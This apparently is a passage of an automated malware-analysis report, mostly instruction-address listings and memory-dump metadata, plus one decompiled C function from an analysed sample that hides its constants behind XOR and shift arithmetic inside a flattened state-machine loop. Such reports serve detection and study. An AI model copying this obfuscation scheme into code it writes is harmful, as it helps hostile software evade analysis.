                                                                                                                                                                                                                    0x00a79518
                                                                                                                                                                                                                    0x00a7951d
                                                                                                                                                                                                                    0x00a79526
                                                                                                                                                                                                                    0x00a79527
                                                                                                                                                                                                                    0x00a7952a
                                                                                                                                                                                                                    0x00a79531
                                                                                                                                                                                                                    0x00a79543
                                                                                                                                                                                                                    0x00a79549
                                                                                                                                                                                                                    0x00a79553
                                                                                                                                                                                                                    0x00a7955a
                                                                                                                                                                                                                    0x00a7955e
                                                                                                                                                                                                                    0x00a79565
                                                                                                                                                                                                                    0x00a79570
                                                                                                                                                                                                                    0x00a79573
                                                                                                                                                                                                                    0x00a7957a
                                                                                                                                                                                                                    0x00a79581
                                                                                                                                                                                                                    0x00a79588
                                                                                                                                                                                                                    0x00a79593
                                                                                                                                                                                                                    0x00a79596
                                                                                                                                                                                                                    0x00a7959d
                                                                                                                                                                                                                    0x00a795a4
                                                                                                                                                                                                                    0x00a795ab
                                                                                                                                                                                                                    0x00a795b2
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a795b8
                                                                                                                                                                                                                    0x00a795ca
                                                                                                                                                                                                                    0x00a796b7
                                                                                                                                                                                                                    0x00a796bd
                                                                                                                                                                                                                    0x00a79782
                                                                                                                                                                                                                    0x00a79789
                                                                                                                                                                                                                    0x00a7978b
                                                                                                                                                                                                                    0x00a79647
                                                                                                                                                                                                                    0x00a79647
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a795b7
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a796c3
                                                                                                                                                                                                                    0x00a796ca
                                                                                                                                                                                                                    0x00a796f3
                                                                                                                                                                                                                    0x00a796f3
                                                                                                                                                                                                                    0x00a796f7
                                                                                                                                                                                                                    0x00a796f9
                                                                                                                                                                                                                    0x00a79701
                                                                                                                                                                                                                    0x00a79704
                                                                                                                                                                                                                    0x00a79731
                                                                                                                                                                                                                    0x00a79752
                                                                                                                                                                                                                    0x00a79757
                                                                                                                                                                                                                    0x00a79765
                                                                                                                                                                                                                    0x00a7976e
                                                                                                                                                                                                                    0x00a7976e
                                                                                                                                                                                                                    0x00a796e9
                                                                                                                                                                                                                    0x00a796e9
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a796e9
                                                                                                                                                                                                                    0x00a796cc
                                                                                                                                                                                                                    0x00a796d4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a796d6
                                                                                                                                                                                                                    0x00a796dd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a796df
                                                                                                                                                                                                                    0x00a796e7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a796e7
                                                                                                                                                                                                                    0x00a795d6
                                                                                                                                                                                                                    0x00a796a4
                                                                                                                                                                                                                    0x00a796aa
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a796aa
                                                                                                                                                                                                                    0x00a795e2
                                                                                                                                                                                                                    0x00a79652
                                                                                                                                                                                                                    0x00a7965a
                                                                                                                                                                                                                    0x00a7965d
                                                                                                                                                                                                                    0x00a79663
                                                                                                                                                                                                                    0x00a79680
                                                                                                                                                                                                                    0x00a79685
                                                                                                                                                                                                                    0x00a79693
                                                                                                                                                                                                                    0x00a7969a
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795b7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a795b7
                                                                                                                                                                                                                    0x00a795b5
                                                                                                                                                                                                                    0x00a795ea
                                                                                                                                                                                                                    0x00a79634
                                                                                                                                                                                                                    0x00a7963f
                                                                                                                                                                                                                    0x00a79641
                                                                                                                                                                                                                    0x00a79641
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a79641
                                                                                                                                                                                                                    0x00a795f2
                                                                                                                                                                                                                    0x00a797b0
                                                                                                                                                                                                                    0x00a797b0
                                                                                                                                                                                                                    0x00a797b6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a797c2
                                                                                                                                                                                                                    0x00a797c2
                                                                                                                                                                                                                    0x00a797c2
                                                                                                                                                                                                                    0x00a7960b
                                                                                                                                                                                                                    0x00a79610
                                                                                                                                                                                                                    0x00a79617
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7961d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7961d
                                                                                                                                                                                                                    0x00a797a1
                                                                                                                                                                                                                    0x00a797aa
                                                                                                                                                                                                                    0x00a797af
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a797af

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 5{'k$SU(C$cy2$d~$pS
                                                                                                                                                                                                                    • API String ID: 0-1906986763
                                                                                                                                                                                                                    • Opcode ID: 8f2059c1d01a19cd511669f02c718ab4b79f9a405c07f8d4a96979e019b302b2
                                                                                                                                                                                                                    • Instruction ID: 27c79e044a549ed7aaf9d8d9596b4200db3c8541385b3e23f4355752652a952c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f2059c1d01a19cd511669f02c718ab4b79f9a405c07f8d4a96979e019b302b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F134B1D00219DBCF28CFE5D98A9DEBBB1FF44314F20815AE519BA2A0D7B05A85CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A6D2C4(void* __edx, intOrPtr _a4, signed int* _a8) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				void* _v40;
                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                    				void* _t217;
                                                                                                                                                                                                                    				signed int _t255;
                                                                                                                                                                                                                    				signed int* _t262;
                                                                                                                                                                                                                    				void* _t264;
                                                                                                                                                                                                                    				signed int _t305;
                                                                                                                                                                                                                    				signed int _t306;
                                                                                                                                                                                                                    				signed int _t307;
                                                                                                                                                                                                                    				signed int _t308;
                                                                                                                                                                                                                    				signed int _t309;
                                                                                                                                                                                                                    				signed int _t310;
                                                                                                                                                                                                                    				void* _t312;
                                                                                                                                                                                                                    				signed int _t313;
                                                                                                                                                                                                                    				void* _t315;
                                                                                                                                                                                                                    				void* _t316;
                                                                                                                                                                                                                    				void* _t318;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t262 = _a8;
                                                                                                                                                                                                                    				_push(_t262);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_t312 = __edx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E00A7C6D8(_t217);
                                                                                                                                                                                                                    				_v44 = 0xaa3937;
                                                                                                                                                                                                                    				_t316 = _t315 + 0x10;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t264 = 0x9ebbf2e;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t313 = 0x24;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_v108 = 0x20ce3b;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x00cfa4ed;
                                                                                                                                                                                                                    				_v108 = _v108 << 0xe;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xdab58000;
                                                                                                                                                                                                                    				_v76 = 0xf63314;
                                                                                                                                                                                                                    				_v76 = _v76 / _t313;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x0006dd70;
                                                                                                                                                                                                                    				_v128 = 0x73c7bd;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x3f70480a;
                                                                                                                                                                                                                    				_t24 =  &_v128; // 0x3f70480a
                                                                                                                                                                                                                    				_t305 = 0x2a;
                                                                                                                                                                                                                    				_v128 =  *_t24 / _t305;
                                                                                                                                                                                                                    				_v128 = _v128 + 0x5440;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x0182859d;
                                                                                                                                                                                                                    				_v88 = 0xc60ea5;
                                                                                                                                                                                                                    				_v88 = _v88 + 0x7bc3;
                                                                                                                                                                                                                    				_v88 = _v88 >> 0xe;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x0007e3f1;
                                                                                                                                                                                                                    				_v52 = 0x4d728a;
                                                                                                                                                                                                                    				_v52 = _v52 >> 0xf;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x000ac539;
                                                                                                                                                                                                                    				_v112 = 0x3e165d;
                                                                                                                                                                                                                    				_t306 = 0x73;
                                                                                                                                                                                                                    				_v112 = _v112 / _t306;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x90d6;
                                                                                                                                                                                                                    				_t307 = 0x70;
                                                                                                                                                                                                                    				_v112 = _v112 * 0x47;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x004cbb3b;
                                                                                                                                                                                                                    				_v56 = 0x84af81;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x4b0b0b54;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x4b8e69c6;
                                                                                                                                                                                                                    				_v100 = 0x872d6c;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x91758f5e;
                                                                                                                                                                                                                    				_v100 = _v100 | 0x4b202757;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0xdbf9a57e;
                                                                                                                                                                                                                    				_v72 = 0xae325f;
                                                                                                                                                                                                                    				_v72 = _v72 >> 4;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0009d8d6;
                                                                                                                                                                                                                    				_v92 = 0xc44d7b;
                                                                                                                                                                                                                    				_v92 = _v92 >> 0xd;
                                                                                                                                                                                                                    				_v92 = _v92 + 0x2e5e;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x00061807;
                                                                                                                                                                                                                    				_v116 = 0xafd3fa;
                                                                                                                                                                                                                    				_v116 = _v116 / _t307;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x3709e682;
                                                                                                                                                                                                                    				_v116 = _v116 | 0x6e9a6108;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x7f954da2;
                                                                                                                                                                                                                    				_v60 = 0x3d1f85;
                                                                                                                                                                                                                    				_v60 = _v60 | 0xdc99090b;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xdcbed5da;
                                                                                                                                                                                                                    				_v124 = 0x98dd8b;
                                                                                                                                                                                                                    				_v124 = _v124 << 4;
                                                                                                                                                                                                                    				_v124 = _v124 / _t313;
                                                                                                                                                                                                                    				_t308 = 0x6a;
                                                                                                                                                                                                                    				_v124 = _v124 / _t308;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x0001f308;
                                                                                                                                                                                                                    				_v80 = 0xe325fe;
                                                                                                                                                                                                                    				_v80 = _v80 >> 0xe;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x0001c393;
                                                                                                                                                                                                                    				_v104 = 0x423829;
                                                                                                                                                                                                                    				_v104 = _v104 | 0x9d91e526;
                                                                                                                                                                                                                    				_v104 = _v104 << 0xf;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0xfe9ed158;
                                                                                                                                                                                                                    				_v120 = 0xfa5623;
                                                                                                                                                                                                                    				_v120 = _v120 + 0xffff6aeb;
                                                                                                                                                                                                                    				_v120 = _v120 + 0xc059;
                                                                                                                                                                                                                    				_t309 = 0xc;
                                                                                                                                                                                                                    				_v120 = _v120 * 0x60;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x5dfc1bf2;
                                                                                                                                                                                                                    				_v96 = 0xa1df06;
                                                                                                                                                                                                                    				_v96 = _v96 | 0xe4890b93;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xee4c0c50;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x0ae1cfcb;
                                                                                                                                                                                                                    				_v64 = 0x1bb4b4;
                                                                                                                                                                                                                    				_v64 = _v64 >> 7;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00016085;
                                                                                                                                                                                                                    				_v68 = 0x2dad5c;
                                                                                                                                                                                                                    				_v68 = _v68 / _t309;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x0002e159;
                                                                                                                                                                                                                    				_v84 = 0x6dfdb;
                                                                                                                                                                                                                    				_t310 = 0x41;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x14;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x348871b7;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x34084366;
                                                                                                                                                                                                                    				_v48 = 0x754320;
                                                                                                                                                                                                                    				_v48 = _v48 / _t310;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000bb7dd;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t318 = _t264 - 0xa303c13;
                                                                                                                                                                                                                    						if(_t318 > 0) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t318 == 0) {
                                                                                                                                                                                                                    							E00A6DA0C(_v64,  *((intOrPtr*)(_t312 + 0x30)),  &_v28, _v68);
                                                                                                                                                                                                                    							_t316 = _t316 + 8;
                                                                                                                                                                                                                    							_t264 = 0xc0d2ec2;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t264 == 0x193856c) {
                                                                                                                                                                                                                    								E00A6B7B7(_v100, _t312 + 0x1c, __eflags, _v72,  &_v28);
                                                                                                                                                                                                                    								_t264 = 0xc559150;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t264 == 0x1d22b9e) {
                                                                                                                                                                                                                    									_t255 = E00A7C6D9(_t262[1]);
                                                                                                                                                                                                                    									 *_t262 = _t255;
                                                                                                                                                                                                                    									__eflags = _t255;
                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                    										_t264 = 0xac5c3ce;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t264 == 0x622cc0a) {
                                                                                                                                                                                                                    										_t262[1] = E00A6ED92(_t312);
                                                                                                                                                                                                                    										_t264 = 0x1d22b9e;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t264 == 0x6ef741c) {
                                                                                                                                                                                                                    											E00A6DA0C(_v80,  *((intOrPtr*)(_t312 + 0xc)),  &_v28, _v104);
                                                                                                                                                                                                                    											_t316 = _t316 + 8;
                                                                                                                                                                                                                    											_t264 = 0xcf285b1;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t264 != 0x9ebbf2e) {
                                                                                                                                                                                                                    												goto L24;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												_t264 = 0x622cc0a;
                                                                                                                                                                                                                    												 *_t262 =  *_t262 & 0x00000000;
                                                                                                                                                                                                                    												_t262[1] = _v108;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                    						__eflags =  *_t262;
                                                                                                                                                                                                                    						_t216 =  *_t262 != 0;
                                                                                                                                                                                                                    						__eflags = _t216;
                                                                                                                                                                                                                    						return 0 | _t216;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t264 - 0xac5c3ce;
                                                                                                                                                                                                                    					if(_t264 == 0xac5c3ce) {
                                                                                                                                                                                                                    						E00A773B3(_v88, _v52,  &_v28, _t262, _v112, _v56);
                                                                                                                                                                                                                    						_t316 = _t316 + 0x10;
                                                                                                                                                                                                                    						_t264 = 0x193856c;
                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						__eflags = _t264 - 0xc0d2ec2;
                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                    							E00A6B7B7(_v84, _t312 + 0x3c, __eflags, _v48,  &_v28);
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							__eflags = _t264 - 0xc559150;
                                                                                                                                                                                                                    							if(_t264 == 0xc559150) {
                                                                                                                                                                                                                    								E00A6DA0C(_v92,  *((intOrPtr*)(_t312 + 0x10)),  &_v28, _v116);
                                                                                                                                                                                                                    								_t316 = _t316 + 8;
                                                                                                                                                                                                                    								_t264 = 0xef6a87e;
                                                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _t264 - 0xcf285b1;
                                                                                                                                                                                                                    								if(_t264 == 0xcf285b1) {
                                                                                                                                                                                                                    									E00A6DA0C(_v120,  *((intOrPtr*)(_t312 + 0x28)),  &_v28, _v96);
                                                                                                                                                                                                                    									_t316 = _t316 + 8;
                                                                                                                                                                                                                    									_t264 = 0xa303c13;
                                                                                                                                                                                                                    									goto L1;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags = _t264 - 0xef6a87e;
                                                                                                                                                                                                                    									if(_t264 != 0xef6a87e) {
                                                                                                                                                                                                                    										goto L24;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										E00A6DA0C(_v60,  *((intOrPtr*)(_t312 + 0x34)),  &_v28, _v124);
                                                                                                                                                                                                                    										_t316 = _t316 + 8;
                                                                                                                                                                                                                    										_t264 = 0x6ef741c;
                                                                                                                                                                                                                    										goto L1;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L27;
                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                    					__eflags = _t264 - 0x2180cf0;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L27;
                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                    0x00a6d2cb
                                                                                                                                                                                                                    0x00a6d2d5
                                                                                                                                                                                                                    0x00a6d2d6
                                                                                                                                                                                                                    0x00a6d2dd
                                                                                                                                                                                                                    0x00a6d2df
                                                                                                                                                                                                                    0x00a6d2e1
                                                                                                                                                                                                                    0x00a6d2e6
                                                                                                                                                                                                                    0x00a6d2f4
                                                                                                                                                                                                                    0x00a6d2f7
                                                                                                                                                                                                                    0x00a6d2fa
                                                                                                                                                                                                                    0x00a6d301
                                                                                                                                                                                                                    0x00a6d302
                                                                                                                                                                                                                    0x00a6d305
                                                                                                                                                                                                                    0x00a6d306
                                                                                                                                                                                                                    0x00a6d30e
                                                                                                                                                                                                                    0x00a6d316
                                                                                                                                                                                                                    0x00a6d31b
                                                                                                                                                                                                                    0x00a6d323
                                                                                                                                                                                                                    0x00a6d333
                                                                                                                                                                                                                    0x00a6d337
                                                                                                                                                                                                                    0x00a6d33f
                                                                                                                                                                                                                    0x00a6d347
                                                                                                                                                                                                                    0x00a6d34f
                                                                                                                                                                                                                    0x00a6d353
                                                                                                                                                                                                                    0x00a6d358
                                                                                                                                                                                                                    0x00a6d35e
                                                                                                                                                                                                                    0x00a6d366
                                                                                                                                                                                                                    0x00a6d36e
                                                                                                                                                                                                                    0x00a6d376
                                                                                                                                                                                                                    0x00a6d37e
                                                                                                                                                                                                                    0x00a6d383
                                                                                                                                                                                                                    0x00a6d38b
                                                                                                                                                                                                                    0x00a6d393
                                                                                                                                                                                                                    0x00a6d398
                                                                                                                                                                                                                    0x00a6d3a0
                                                                                                                                                                                                                    0x00a6d3ac
                                                                                                                                                                                                                    0x00a6d3b1
                                                                                                                                                                                                                    0x00a6d3b7
                                                                                                                                                                                                                    0x00a6d3c4
                                                                                                                                                                                                                    0x00a6d3c5
                                                                                                                                                                                                                    0x00a6d3c9
                                                                                                                                                                                                                    0x00a6d3d1
                                                                                                                                                                                                                    0x00a6d3d9
                                                                                                                                                                                                                    0x00a6d3e1
                                                                                                                                                                                                                    0x00a6d3e9
                                                                                                                                                                                                                    0x00a6d3f1
                                                                                                                                                                                                                    0x00a6d3f9
                                                                                                                                                                                                                    0x00a6d401
                                                                                                                                                                                                                    0x00a6d409
                                                                                                                                                                                                                    0x00a6d411
                                                                                                                                                                                                                    0x00a6d416
                                                                                                                                                                                                                    0x00a6d41e
                                                                                                                                                                                                                    0x00a6d426
                                                                                                                                                                                                                    0x00a6d42b
                                                                                                                                                                                                                    0x00a6d433
                                                                                                                                                                                                                    0x00a6d43b
                                                                                                                                                                                                                    0x00a6d449
                                                                                                                                                                                                                    0x00a6d44d
                                                                                                                                                                                                                    0x00a6d455
                                                                                                                                                                                                                    0x00a6d45f
                                                                                                                                                                                                                    0x00a6d467
                                                                                                                                                                                                                    0x00a6d46f
                                                                                                                                                                                                                    0x00a6d477
                                                                                                                                                                                                                    0x00a6d47f
                                                                                                                                                                                                                    0x00a6d487
                                                                                                                                                                                                                    0x00a6d494
                                                                                                                                                                                                                    0x00a6d4a3
                                                                                                                                                                                                                    0x00a6d4a8
                                                                                                                                                                                                                    0x00a6d4ae
                                                                                                                                                                                                                    0x00a6d4b6
                                                                                                                                                                                                                    0x00a6d4be
                                                                                                                                                                                                                    0x00a6d4c3
                                                                                                                                                                                                                    0x00a6d4cb
                                                                                                                                                                                                                    0x00a6d4d3
                                                                                                                                                                                                                    0x00a6d4db
                                                                                                                                                                                                                    0x00a6d4e0
                                                                                                                                                                                                                    0x00a6d4e8
                                                                                                                                                                                                                    0x00a6d4f0
                                                                                                                                                                                                                    0x00a6d4f8
                                                                                                                                                                                                                    0x00a6d505
                                                                                                                                                                                                                    0x00a6d508
                                                                                                                                                                                                                    0x00a6d50c
                                                                                                                                                                                                                    0x00a6d514
                                                                                                                                                                                                                    0x00a6d51c
                                                                                                                                                                                                                    0x00a6d524
                                                                                                                                                                                                                    0x00a6d52c
                                                                                                                                                                                                                    0x00a6d534
                                                                                                                                                                                                                    0x00a6d53c
                                                                                                                                                                                                                    0x00a6d541
                                                                                                                                                                                                                    0x00a6d549
                                                                                                                                                                                                                    0x00a6d559
                                                                                                                                                                                                                    0x00a6d55d
                                                                                                                                                                                                                    0x00a6d565
                                                                                                                                                                                                                    0x00a6d572
                                                                                                                                                                                                                    0x00a6d573
                                                                                                                                                                                                                    0x00a6d577
                                                                                                                                                                                                                    0x00a6d57f
                                                                                                                                                                                                                    0x00a6d587
                                                                                                                                                                                                                    0x00a6d59a
                                                                                                                                                                                                                    0x00a6d59e
                                                                                                                                                                                                                    0x00a6d59e
                                                                                                                                                                                                                    0x00a6d5a6
                                                                                                                                                                                                                    0x00a6d5a6
                                                                                                                                                                                                                    0x00a6d5a6
                                                                                                                                                                                                                    0x00a6d5a6
                                                                                                                                                                                                                    0x00a6d5a8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5ae
                                                                                                                                                                                                                    0x00a6d678
                                                                                                                                                                                                                    0x00a6d67d
                                                                                                                                                                                                                    0x00a6d680
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5b4
                                                                                                                                                                                                                    0x00a6d5ba
                                                                                                                                                                                                                    0x00a6d657
                                                                                                                                                                                                                    0x00a6d65e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5c0
                                                                                                                                                                                                                    0x00a6d5c6
                                                                                                                                                                                                                    0x00a6d630
                                                                                                                                                                                                                    0x00a6d635
                                                                                                                                                                                                                    0x00a6d638
                                                                                                                                                                                                                    0x00a6d63a
                                                                                                                                                                                                                    0x00a6d640
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d640
                                                                                                                                                                                                                    0x00a6d5c8
                                                                                                                                                                                                                    0x00a6d5ce
                                                                                                                                                                                                                    0x00a6d61b
                                                                                                                                                                                                                    0x00a6d61e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5d0
                                                                                                                                                                                                                    0x00a6d5d6
                                                                                                                                                                                                                    0x00a6d605
                                                                                                                                                                                                                    0x00a6d60a
                                                                                                                                                                                                                    0x00a6d60d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5d8
                                                                                                                                                                                                                    0x00a6d5de
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5e4
                                                                                                                                                                                                                    0x00a6d5e8
                                                                                                                                                                                                                    0x00a6d5ed
                                                                                                                                                                                                                    0x00a6d5f0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d5f0
                                                                                                                                                                                                                    0x00a6d5de
                                                                                                                                                                                                                    0x00a6d5d6
                                                                                                                                                                                                                    0x00a6d5ce
                                                                                                                                                                                                                    0x00a6d5c6
                                                                                                                                                                                                                    0x00a6d5ba
                                                                                                                                                                                                                    0x00a6d766
                                                                                                                                                                                                                    0x00a6d768
                                                                                                                                                                                                                    0x00a6d76c
                                                                                                                                                                                                                    0x00a6d76c
                                                                                                                                                                                                                    0x00a6d776
                                                                                                                                                                                                                    0x00a6d776
                                                                                                                                                                                                                    0x00a6d68a
                                                                                                                                                                                                                    0x00a6d68c
                                                                                                                                                                                                                    0x00a6d733
                                                                                                                                                                                                                    0x00a6d738
                                                                                                                                                                                                                    0x00a6d73b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d692
                                                                                                                                                                                                                    0x00a6d692
                                                                                                                                                                                                                    0x00a6d698
                                                                                                                                                                                                                    0x00a6d75e
                                                                                                                                                                                                                    0x00a6d69e
                                                                                                                                                                                                                    0x00a6d69e
                                                                                                                                                                                                                    0x00a6d6a4
                                                                                                                                                                                                                    0x00a6d70b
                                                                                                                                                                                                                    0x00a6d710
                                                                                                                                                                                                                    0x00a6d713
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d6a6
                                                                                                                                                                                                                    0x00a6d6a6
                                                                                                                                                                                                                    0x00a6d6ac
                                                                                                                                                                                                                    0x00a6d6ec
                                                                                                                                                                                                                    0x00a6d6f1
                                                                                                                                                                                                                    0x00a6d6f4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d6ae
                                                                                                                                                                                                                    0x00a6d6ae
                                                                                                                                                                                                                    0x00a6d6b4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d6ba
                                                                                                                                                                                                                    0x00a6d6ca
                                                                                                                                                                                                                    0x00a6d6cf
                                                                                                                                                                                                                    0x00a6d6d2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d6d2
                                                                                                                                                                                                                    0x00a6d6b4
                                                                                                                                                                                                                    0x00a6d6ac
                                                                                                                                                                                                                    0x00a6d6a4
                                                                                                                                                                                                                    0x00a6d698
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6d740
                                                                                                                                                                                                                    0x00a6d740
                                                                                                                                                                                                                    0x00a6d740
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Hp?$ Cu$)8B$W' K$^.
                                                                                                                                                                                                                    • API String ID: 0-1569097551
